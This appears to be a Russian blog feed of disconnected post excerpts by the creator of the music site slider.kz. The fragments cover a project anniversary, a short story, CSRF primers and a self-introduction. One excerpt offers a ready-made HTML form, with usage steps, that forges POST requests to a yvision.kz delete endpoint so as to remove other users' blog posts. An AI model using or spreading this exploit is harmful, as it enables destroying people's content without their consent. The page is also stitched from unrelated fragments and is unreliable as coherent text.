Немногие наверное знают, но сегодня тот день когда появились первые строки кода проекта www.slider.kz

Проект ещё не имел домена, и не был выпущен для общего использования, но активно тестировался друзьями, за что я им очень благодарен...

За год произошло много изменений, оптимизаций, баг фиксов..

То, что нужно! Отличная погода для отличной субботней прогулки по городу.

Отключив плеер от лэптопа, на который уже слилась свежая музыка, я выключил телевизор как раз в тот момент, когда на одном из городских каналов показывали сюжет про какой-то несчастный случай с газелью на улицах города, вследствие которого кто-то пострадал.

Уже тогда я твёрдо решил, что не буду портить себе этот дивный день плохими новостями.

- Нет, нет, нет…  только не сегодня… этот день должен быть особенным, только позитив…  - *Клац* по кнопке пульта загасил эту трагичную историю.

Несмотря на многочисленные трудности которые всё ещё являются актуальными..

Надеюсь все проблемы в ближайшее время урегулируются...

Неправильная обработка данных, это плохо.. очень плохо

Форма для выпиливания чужих блогов на yvision-е
Для использования:

1. Копируете текст ниже в "блокнот"
2. изменяете данные на свои в строке: "ВАШ_НИК.yvision.kz" - (в моём случае это выглядело бы так slider.yvision.kz)
3. Файл -> Сохранить как -> выпилятор.html
4. запускаем, указываем ID поста для удаления
5. ??????????????????
6. PROFIT

P.S Действуйте на свой страх и риск, всегда можно узнать, кто и что выпиливал..

1. <html style='background:#2b2b2b;color:#aaa;'>
2. <center>
3. <form action="http://ВАШ_НИК.yvision.kz/manage/delete/" method="POST">
4. <b>Введите ID поста для удаления:</b><br><br>
5. <input type="text" name="item_id" value="id"><br>
6. <input type="submit">
7. </form>
8. <center>
9. </html>

[~] EPIC FIX - Исправили баг..

Или всё-таки,  может, стоит пропустить  эту статью?  Зачем вам это?

Вы и так отлично спите,  и вас ничего не будет беспокоить, до этого самого момента, пока вы не сделаете один клик мышкой.

Но кто его знает!?.. Может быть, вы только приобретете уверенность, что всё и так хорошо, и жизнь прекрасна.

Если вы перейдёте по ссылке, будет произведено автоматическое сканирование вашего “железа”, и возможно будет получен доступ к вашим персональным данным,  вы предупреждены, выбор остаётся только за вами…

Благодаря Ивану Правдорубу, этот рассказ буквально переродился, я написал его давно, но так не смог передать всё то, что хотел изложить..

Чего уж там, пожалуй рассказ был бы навсегда потерян, если бы не вы ivan_pravdorub , большое вам спасибо...

В прошлой статье я затронул основы CSRF (Сross Site Request Forgery — "Подделка межсайтовых запросов")
А сегодня, я хочу остановиться подробней "межсайтовых запросах", этот тип атаки на WEB приложения является довольно старым но по прежнему довольно актуальным..

Вы когда-нибудь задумывались, что серфенгуя по форумам, чатам, блогам о вас можно узнать намного больше чем “ваш логин”.. всего лишь используя - социальные сети?

Всем привет! Меня зовут cлайдер.

Я создатель музыкального поисковика www.slider.kz, проект был создан для того, что бы вы могли найти и скачать музыку без ограничений, ожиданий, смс и прочего мусора на скорости которую нам "любезно" обрезал\предоставил телеком.

Проект новый, не так давно начал свою жизнь. Я все время работаю над ним совершенствуя и вводя новый функционал.

Прошу любить и жаловать. Адекватная критика, предложения и пожелания только приветствуются.